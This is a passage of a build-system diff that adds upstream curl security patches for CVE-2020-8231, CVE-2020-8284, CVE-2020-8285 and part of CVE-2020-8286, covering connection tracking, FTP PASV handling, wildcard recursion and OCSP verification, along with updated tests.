+   /* make sure there's no pending message in the queue sent from this easy
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index d3926d9..fffa6ad 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -50,6 +50,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -65,6 +67,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -74,6 +78,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ </datacheck>
+ </reply>
+ 
+-- 
+2.25.4
+
+
+From 01148ee40dd913a169435b0f9ea90e6393821e70 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sun, 16 Aug 2020 11:34:35 +0200
+Subject: [PATCH 3/3] Curl_easy: remember last connection by id, not by pointer
+
+CVE-2020-8231
+
+Bug: https://curl.haxx.se/docs/CVE-2020-8231.html
+
+Reported-by: Marc Aldorasi
+Closes #5824
+
+Upstream-commit: 3c9e021f86872baae412a427e807fbfa2f3e8a22
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/connect.c | 19 ++++++++++---------
+ lib/easy.c    |  3 +--
+ lib/multi.c   |  9 +++++----
+ lib/url.c     |  2 +-
+ lib/urldata.h |  2 +-
+ 5 files changed, 18 insertions(+), 17 deletions(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index 29293f0..e1c5662 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -1356,15 +1356,15 @@ CURLcode Curl_connecthost(struct connectdata *conn,  /* context */
+ }
+ 
+ struct connfind {
+-  struct connectdata *tofind;
+-  bool found;
++  long id_tofind;
++  struct connectdata *found;
+ };
+ 
+ static int conn_is_conn(struct connectdata *conn, void *param)
+ {
+   struct connfind *f = (struct connfind *)param;
+-  if(conn == f->tofind) {
+-    f->found = TRUE;
++  if(conn->connection_id == f->id_tofind) {
++    f->found = conn;
+     return 1;
+   }
+   return 0;
+@@ -1386,21 +1386,22 @@ curl_socket_t Curl_getconnectinfo(struct Curl_easy *data,
+    * - that is associated with a multi handle, and whose connection
+    *   was detached with CURLOPT_CONNECT_ONLY
+    */
+-  if(data->state.lastconnect && (data->multi_easy || data->multi)) {
+-    struct connectdata *c = data->state.lastconnect;
++  if((data->state.lastconnect_id != -1) && (data->multi_easy || data->multi)) {
++    struct connectdata *c;
+     struct connfind find;
+-    find.tofind = data->state.lastconnect;
+-    find.found = FALSE;
++    find.id_tofind = data->state.lastconnect_id;
++    find.found = NULL;
+ 
+     Curl_conncache_foreach(data, data->multi_easy?
+                            &data->multi_easy->conn_cache:
+                            &data->multi->conn_cache, &find, conn_is_conn);
+ 
+     if(!find.found) {
+-      data->state.lastconnect = NULL;
++      data->state.lastconnect_id = -1;
+       return CURL_SOCKET_BAD;
+     }
+ 
++    c = find.found;
+     if(connp) {
+       /* only store this if the caller cares for it */
+       *connp = c;
+diff --git a/lib/easy.c b/lib/easy.c
+index 292cca7..a69eb9e 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -831,8 +831,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+ 
+   /* the connection cache is setup on demand */
+   outcurl->state.conn_cache = NULL;
+-
+-  outcurl->state.lastconnect = NULL;
++  outcurl->state.lastconnect_id = -1;
+ 
+   outcurl->progress.flags    = data->progress.flags;
+   outcurl->progress.callback = data->progress.callback;
+diff --git a/lib/multi.c b/lib/multi.c
+index f1371bd..778c537 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -453,6 +453,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+     data->state.conn_cache = &data->share->conn_cache;
+   else
+     data->state.conn_cache = &multi->conn_cache;
++  data->state.lastconnect_id = -1;
+ 
+ #ifdef USE_LIBPSL
+   /* Do the same for PSL. */
+@@ -671,11 +672,11 @@ static CURLcode multi_done(struct Curl_easy *data,
+     CONNCACHE_UNLOCK(data);
+     if(Curl_conncache_return_conn(data, conn)) {
+       /* remember the most recently used connection */
+-      data->state.lastconnect = conn;
++      data->state.lastconnect_id = conn->connection_id;
+       infof(data, "%s\n", buffer);
+     }
+     else
+-      data->state.lastconnect = NULL;
++      data->state.lastconnect_id = -1;
+   }
+ 
+   Curl_free_request_state(data);
+@@ -686,7 +687,7 @@ static int close_connect_only(struct connectdata *conn, void *param)
+ {
+   struct Curl_easy *data = param;
+ 
+-  if(data->state.lastconnect != conn)
++  if(data->state.lastconnect_id != conn->connection_id)
+     return 0;
+ 
+   if(conn->data != data)
+@@ -794,7 +795,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+   /* Remove the association between the connection and the handle */
+   Curl_detach_connnection(data);
+ 
+-  if(data->state.lastconnect) {
++  if(data->state.lastconnect_id != -1) {
+     /* Mark any connect-only connection for closure */
+     Curl_conncache_foreach(data, data->state.conn_cache,
+                            data, &close_connect_only);
+diff --git a/lib/url.c b/lib/url.c
+index a1a6b69..2919a3d 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -617,7 +617,7 @@ CURLcode Curl_open(struct Curl_easy **curl)
+       Curl_initinfo(data);
+ 
+       /* most recent connection is not yet defined */
+-      data->state.lastconnect = NULL;
++      data->state.lastconnect_id = -1;
+ 
+       data->progress.flags |= PGRS_HIDE;
+       data->state.current_speed = -1; /* init to negative == impossible */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index f80a02d..6d8eb69 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1332,7 +1332,7 @@ struct UrlState {
+   /* buffers to store authentication data in, as parsed from input options */
+   struct curltime keeps_speed; /* for the progress meter really */
+ 
+-  struct connectdata *lastconnect; /* The last connection, NULL if undefined */
++  long lastconnect_id; /* The last connection, -1 if undefined */
+ 
+   char *headerbuff; /* allocated buffer to store headers in */
+   size_t headersize;   /* size of the allocation */
+-- 
+2.25.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8284.patch b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
new file mode 100644
index 0000000000..ed6e8049a6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
@@ -0,0 +1,209 @@
+From ec9cc725d598ac77de7b6df8afeec292b3c8ad46 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 24 Nov 2020 14:56:57 +0100
+Subject: [PATCH] ftp: CURLOPT_FTP_SKIP_PASV_IP by default
+
+The command line tool also independently sets --ftp-skip-pasv-ip by
+default.
+
+Ten test cases updated to adapt the modified --libcurl output.
+
+Bug: https://curl.se/docs/CVE-2020-8284.html
+CVE-2020-8284
+
+Reported-by: Varnavas Papaioannou
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/ec9cc725d598ac]
+CVE: CVE-2020-8284
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ docs/cmdline-opts/ftp-skip-pasv-ip.d         |   2 ++
+ docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 |   8 +++++---
+ lib/url.c                                    |   1 +
+ src/tool_cfgable.c                           |   1 +
+ tests/data/test1400                          |   1 +
+ tests/data/test1401                          |   1 +
+ tests/data/test1402                          |   1 +
+ tests/data/test1403                          |   1 +
+ tests/data/test1404                          |   1 +
+ tests/data/test1405                          |   1 +
+ tests/data/test1406                          |   1 +
+ tests/data/test1407                          |   1 +
+ tests/data/test1420                          |   1 +
+ 14 files changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/docs/cmdline-opts/ftp-skip-pasv-ip.d b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+index d6fd4589b1e..bcf4e7e62f2 100644
+--- a/docs/cmdline-opts/ftp-skip-pasv-ip.d
++++ b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+@@ -10,4 +10,6 @@ to curl's PASV command when curl connects the data connection. Instead curl
+ will re-use the same IP address it already uses for the control
+ connection.
+ 
++Since curl 7.74.0 this option is enabled by default.
++
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+diff --git a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+index d6217d0d8ca..fa87ddce769 100644
+--- a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
++++ b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+@@ -5,7 +5,7 @@
+ .\" *                            | (__| |_| |  _ <| |___
+ .\" *                             \___|\___/|_| \_\_____|
+ .\" *
+-.\" * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
++.\" * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ .\" *
+ .\" * This software is licensed as described in the file COPYING, which
+ .\" * you should have received as part of this distribution. The terms
+@@ -35,11 +35,13 @@ address it already uses for the control connection. But it will use the port
+ number from the 227-response.
+ 
+ This option thus allows libcurl to work around broken server installations
+-that due to NATs, firewalls or incompetence report the wrong IP address back.
++that due to NATs, firewalls or incompetence report the wrong IP address
++back. Setting the option also reduces the risk for various sorts of client
++abuse by malicious servers.
+ 
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+ .SH DEFAULT
+-0
++1 since 7.74.0, was 0 before then.
+ .SH PROTOCOLS
+ FTP
+ .SH EXAMPLE
+diff --git a/lib/url.c b/lib/url.c
+index f8b2a0030de..2b0ba87ba87 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -497,6 +497,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+   set->ftp_use_eprt = TRUE;   /* FTP defaults to EPRT operations */
+   set->ftp_use_pret = FALSE;  /* mainly useful for drftpd servers */
+   set->ftp_filemethod = FTPFILE_MULTICWD;
++  set->ftp_skip_ip = TRUE;    /* skip PASV IP by default */
+ #endif
+   set->dns_cache_timeout = 60; /* Timeout every 60 seconds by default */
+ 
+diff --git a/src/tool_cfgable.c b/src/tool_cfgable.c
+index c52d8e1c6bb..4c06d3557b7 100644
+--- a/src/tool_cfgable.c
++++ b/src/tool_cfgable.c
+@@ -44,6 +44,7 @@ void config_init(struct OperationConfig *config)
+   config->tcp_nodelay = TRUE; /* enabled by default */
+   config->happy_eyeballs_timeout_ms = CURL_HET_DEFAULT;
+   config->http09_allowed = FALSE;
++  config->ftp_skip_ip = TRUE;
+ }
+ 
+ static void free_config_fields(struct OperationConfig *config)
+diff --git a/tests/data/test1400 b/tests/data/test1400
+index 812ad0b88d9..b7060eca58e 100644
+--- a/tests/data/test1400
++++ b/tests/data/test1400
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+   curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1401 b/tests/data/test1401
+index f93b3d637de..a2629683aff 100644
+--- a/tests/data/test1401
++++ b/tests/data/test1401
+@@ -87,6 +87,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+   curl_easy_setopt(hnd, CURLOPT_COOKIE, "chocolate=chip");
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+   curl_easy_setopt(hnd, CURLOPT_PROTOCOLS, (long)CURLPROTO_FILE |
+                                            (long)CURLPROTO_FTP |
+diff --git a/tests/data/test1402 b/tests/data/test1402
+index 7593c516da1..1bd55cb4e3b 100644
+--- a/tests/data/test1402
++++ b/tests/data/test1402
+@@ -78,6 +78,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+   curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1403 b/tests/data/test1403
+index ecb4dd3dcab..a7c9fcca322 100644
+--- a/tests/data/test1403
++++ b/tests/data/test1403
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+   curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1404 b/tests/data/test1404
+index 97622b63948..1d8e8cf7779 100644
+--- a/tests/data/test1404
++++ b/tests/data/test1404
+@@ -147,6 +147,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+   curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1405 b/tests/data/test1405
+index 2bac79eda74..b4087704f7b 100644
+--- a/tests/data/test1405
++++ b/tests/data/test1405
+@@ -89,6 +89,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_POSTQUOTE, slist2);
+   curl_easy_setopt(hnd, CURLOPT_PREQUOTE, slist3);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1406 b/tests/data/test1406
+index 51a166adff2..38f68d11ee1 100644
+--- a/tests/data/test1406
++++ b/tests/data/test1406
+@@ -79,6 +79,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_URL, "smtp://%HOSTIP:%SMTPPORT/1406");
+   curl_easy_setopt(hnd, CURLOPT_UPLOAD, 1L);
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+   curl_easy_setopt(hnd, CURLOPT_MAIL_FROM, "sender@example.com");
+   curl_easy_setopt(hnd, CURLOPT_MAIL_RCPT, slist1);
+diff --git a/tests/data/test1407 b/tests/data/test1407
+index f6879008fb2..a7e13ba7585 100644
+--- a/tests/data/test1407
++++ b/tests/data/test1407
+@@ -62,6 +62,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_DIRLISTONLY, 1L);
+   curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1420 b/tests/data/test1420
+index 057ecc4773a..4b8d7bbf418 100644
+--- a/tests/data/test1420
++++ b/tests/data/test1420
+@@ -67,6 +67,7 @@ int main(int argc, char *argv[])
+   curl_easy_setopt(hnd, CURLOPT_URL, "imap://%HOSTIP:%IMAPPORT/1420/;MAILINDEX=1");
+   curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+   curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++  curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+   curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ 
+   /* Here is a list of options the curl code used that cannot get generated
+
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8285.patch b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
new file mode 100644
index 0000000000..a66729b180
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
@@ -0,0 +1,260 @@
+From 6fda045b19a9066701b5e09cfa657a13a3accbf3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sat, 28 Nov 2020 00:27:21 +0100
+Subject: [PATCH] ftp: make wc_statemach loop instead of recurse
+
+CVE-2020-8285
+
+Fixes #6255
+Bug: https://curl.se/docs/CVE-2020-8285.html
+Reported-by: xnynx on github
+
+Upstream-commit: 69a358f2186e04cf44698b5100332cbf1ee7f01d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0006-curl-7.69.1-CVE-2020-8285.patch]
+CVE: CVE-2020-8285
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ftp.c | 202 +++++++++++++++++++++++++++---------------------------
+ 1 file changed, 102 insertions(+), 100 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 57b22ad..3382772 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -3763,129 +3763,131 @@ static CURLcode init_wc_data(struct connectdata *conn)
+   return result;
+ }
+ 
+-/* This is called recursively */
+ static CURLcode wc_statemach(struct connectdata *conn)
+ {
+   struct WildcardData * const wildcard = &(conn->data->wildcard);
+   CURLcode result = CURLE_OK;
+ 
+-  switch(wildcard->state) {
+-  case CURLWC_INIT:
+-    result = init_wc_data(conn);
+-    if(wildcard->state == CURLWC_CLEAN)
+-      /* only listing! */
+-      break;
+-    wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
+-    break;
++  for(;;) {
++    switch(wildcard->state) {
++    case CURLWC_INIT:
++      result = init_wc_data(conn);
++      if(wildcard->state == CURLWC_CLEAN)
++        /* only listing! */
++        return result;
++      wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
++      return result;
+ 
+-  case CURLWC_MATCHING: {
+-    /* In this state is LIST response successfully parsed, so lets restore
+-       previous WRITEFUNCTION callback and WRITEDATA pointer */
+-    struct ftp_wc *ftpwc = wildcard->protdata;
+-    conn->data->set.fwrite_func = ftpwc->backup.write_function;
+-    conn->data->set.out = ftpwc->backup.file_descriptor;
+-    ftpwc->backup.write_function = ZERO_NULL;
+-    ftpwc->backup.file_descriptor = NULL;
+-    wildcard->state = CURLWC_DOWNLOADING;
+-
+-    if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
+-      /* error found in LIST parsing */
+-      wildcard->state = CURLWC_CLEAN;
+-      return wc_statemach(conn);
+-    }
+-    if(wildcard->filelist.size == 0) {
+-      /* no corresponding file */
+-      wildcard->state = CURLWC_CLEAN;
+-      return CURLE_REMOTE_FILE_NOT_FOUND;
++    case CURLWC_MATCHING: {
++      /* In this state is LIST response successfully parsed, so lets restore
++         previous WRITEFUNCTION callback and WRITEDATA pointer */
++      struct ftp_wc *ftpwc = wildcard->protdata;
++      conn->data->set.fwrite_func = ftpwc->backup.write_function;
++      conn->data->set.out = ftpwc->backup.file_descriptor;
++      ftpwc->backup.write_function = ZERO_NULL;
++      ftpwc->backup.file_descriptor = NULL;
++      wildcard->state = CURLWC_DOWNLOADING;
++
++      if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
++        /* error found in LIST parsing */
++        wildcard->state = CURLWC_CLEAN;
++        continue;
++      }
++      if(wildcard->filelist.size == 0) {
++        /* no corresponding file */
++        wildcard->state = CURLWC_CLEAN;
++        return CURLE_REMOTE_FILE_NOT_FOUND;
++      }
++      continue;
+     }
+-    return wc_statemach(conn);
+-  }
+ 
+-  case CURLWC_DOWNLOADING: {
+-    /* filelist has at least one file, lets get first one */
+-    struct ftp_conn *ftpc = &conn->proto.ftpc;
+-    struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
+-    struct FTP *ftp = conn->data->req.protop;
++    case CURLWC_DOWNLOADING: {
++      /* filelist has at least one file, lets get first one */
++      struct ftp_conn *ftpc = &conn->proto.ftpc;
++      struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
++      struct FTP *ftp = conn->data->req.protop;
+ 
+-    char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
+-    if(!tmp_path)
+-      return CURLE_OUT_OF_MEMORY;
++      char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
++      if(!tmp_path)
++        return CURLE_OUT_OF_MEMORY;
+ 
+-    /* switch default ftp->path and tmp_path */
+-    free(ftp->pathalloc);
+-    ftp->pathalloc = ftp->path = tmp_path;
+-
+-    infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
+-    if(conn->data->set.chunk_bgn) {
+-      long userresponse;
+-      Curl_set_in_callback(conn->data, true);
+-      userresponse = conn->data->set.chunk_bgn(
+-        finfo, wildcard->customptr, (int)wildcard->filelist.size);
+-      Curl_set_in_callback(conn->data, false);
+-      switch(userresponse) {
+-      case CURL_CHUNK_BGN_FUNC_SKIP:
+-        infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
+-              finfo->filename);
+-        wildcard->state = CURLWC_SKIP;
+-        return wc_statemach(conn);
+-      case CURL_CHUNK_BGN_FUNC_FAIL:
+-        return CURLE_CHUNK_FAILED;
++      /* switch default ftp->path and tmp_path */
++      free(ftp->pathalloc);
++      ftp->pathalloc = ftp->path = tmp_path;
++
++      infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
++      if(conn->data->set.chunk_bgn) {
++        long userresponse;
++        Curl_set_in_callback(conn->data, true);
++        userresponse = conn->data->set.chunk_bgn(
++          finfo, wildcard->customptr, (int)wildcard->filelist.size);
++        Curl_set_in_callback(conn->data, false);
++        switch(userresponse) {
++        case CURL_CHUNK_BGN_FUNC_SKIP:
++          infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
++                finfo->filename);
++          wildcard->state = CURLWC_SKIP;
++          continue;
++        case CURL_CHUNK_BGN_FUNC_FAIL:
++          return CURLE_CHUNK_FAILED;
++        }
+       }
+-    }
+ 
+-    if(finfo->filetype != CURLFILETYPE_FILE) {
+-      wildcard->state = CURLWC_SKIP;
+-      return wc_statemach(conn);
+-    }
++      if(finfo->filetype != CURLFILETYPE_FILE) {
++        wildcard->state = CURLWC_SKIP;
++        continue;
++      }
+ 
+-    if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
+-      ftpc->known_filesize = finfo->size;
++      if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
++        ftpc->known_filesize = finfo->size;
+ 
+-    result = ftp_parse_url_path(conn);
+-    if(result)
+-      return result;
++      result = ftp_parse_url_path(conn);
++      if(result)
++        return result;
+ 
+-    /* we don't need the Curl_fileinfo of first file anymore */
+-    Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++      /* we don't need the Curl_fileinfo of first file anymore */
++      Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+ 
+-    if(wildcard->filelist.size == 0) { /* remains only one file to down. */
+-      wildcard->state = CURLWC_CLEAN;
+-      /* after that will be ftp_do called once again and no transfer
+-         will be done because of CURLWC_CLEAN state */
+-      return CURLE_OK;
++      if(wildcard->filelist.size == 0) { /* remains only one file to down. */
++        wildcard->state = CURLWC_CLEAN;
++        /* after that will be ftp_do called once again and no transfer
++           will be done because of CURLWC_CLEAN state */
++        return CURLE_OK;
++      }
++      return result;
+     }
+-  } break;
+ 
+-  case CURLWC_SKIP: {
+-    if(conn->data->set.chunk_end) {
+-      Curl_set_in_callback(conn->data, true);
+-      conn->data->set.chunk_end(conn->data->wildcard.customptr);
+-      Curl_set_in_callback(conn->data, false);
++    case CURLWC_SKIP: {
++      if(conn->data->set.chunk_end) {
++        Curl_set_in_callback(conn->data, true);
++        conn->data->set.chunk_end(conn->data->wildcard.customptr);
++        Curl_set_in_callback(conn->data, false);
++      }
++      Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++      wildcard->state = (wildcard->filelist.size == 0) ?
++        CURLWC_CLEAN : CURLWC_DOWNLOADING;
++      continue;
+     }
+-    Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+-    wildcard->state = (wildcard->filelist.size == 0) ?
+-                      CURLWC_CLEAN : CURLWC_DOWNLOADING;
+-    return wc_statemach(conn);
+-  }
+ 
+-  case CURLWC_CLEAN: {
+-    struct ftp_wc *ftpwc = wildcard->protdata;
+-    result = CURLE_OK;
+-    if(ftpwc)
+-      result = Curl_ftp_parselist_geterror(ftpwc->parser);
++    case CURLWC_CLEAN: {
++      struct ftp_wc *ftpwc = wildcard->protdata;
++      result = CURLE_OK;
++      if(ftpwc)
++        result = Curl_ftp_parselist_geterror(ftpwc->parser);
+ 
+-    wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
+-  } break;
++      wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
++      return result;
++    }
+ 
+-  case CURLWC_DONE:
+-  case CURLWC_ERROR:
+-  case CURLWC_CLEAR:
+-    if(wildcard->dtor)
+-      wildcard->dtor(wildcard->protdata);
+-    break;
++    case CURLWC_DONE:
++    case CURLWC_ERROR:
++    case CURLWC_CLEAR:
++      if(wildcard->dtor)
++        wildcard->dtor(wildcard->protdata);
++      return result;
++    }
+   }
+-
+-  return result;
++  /* UNREACHABLE */
+ }
+ 
+ /***********************************************************************
+-- 
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8286.patch b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
new file mode 100644
index 0000000000..093562fe01
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
@@ -0,0 +1,133 @@
+From 43d1163b3730f715704240f7f6d31af289246873 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 2 Dec 2020 23:01:11 +0100
+Subject: [PATCH] openssl: make the OCSP verification verify the certificate id
+
+CVE-2020-8286
+
+Reported by anonymous
+
+Bug: https://curl.se/docs/CVE-2020-8286.html
+
+Upstream-commit: d9d01672785b8ac04aab1abb6de95fe3072ae199
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0007-curl-7.71.1-CVE-2020-8286.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/vtls/openssl.c | 83 ++++++++++++++++++++++++++++++----------------
+ 1 file changed, 54 insertions(+), 29 deletions(-)
+
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cad..bcfd83b 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -1717,6 +1717,11 @@ static CURLcode verifystatus(struct connectdata *conn,
+   OCSP_BASICRESP *br = NULL;
+   X509_STORE     *st = NULL;
+   STACK_OF(X509) *ch = NULL;
++  X509 *cert;
++  OCSP_CERTID *id = NULL;
++  int cert_status, crl_reason;
++  ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++  int ret;
+ 
+   long len = SSL_get_tlsext_status_ocsp_resp(BACKEND->handle, &status);
+ 
+@@ -1785,43 +1790,63 @@ static CURLcode verifystatus(struct connectdata *conn,
+     goto end;
+   }
+ 
+-  for(i = 0; i < OCSP_resp_count(br); i++) {
+-    int cert_status, crl_reason;
+-    OCSP_SINGLERESP *single = NULL;
+-
+-    ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++  /* Compute the certificate's ID */
++  cert = SSL_get_peer_certificate(BACKEND->handle);
++  if(!cert) {
++    failf(data, "Error getting peer certficate");
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    goto end;
++  }
+ 
+-    single = OCSP_resp_get0(br, i);
+-    if(!single)
+-      continue;
++  for(i = 0; i < sk_X509_num(ch); i++) {
++    X509 *issuer = sk_X509_value(ch, i);
++    if(X509_check_issued(issuer, cert) == X509_V_OK) {
++      id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);
++      break;
++    }
++  }
++  X509_free(cert);
+ 
+-    cert_status = OCSP_single_get0_status(single, &crl_reason, &rev,
+-                                          &thisupd, &nextupd);
++  if(!id) {
++    failf(data, "Error computing OCSP ID");
++    result = CURLE_SSL_INVALIDCERTSTATUS;
++    goto end;
++  }
+ 
+-    if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
+-      failf(data, "OCSP response has expired");
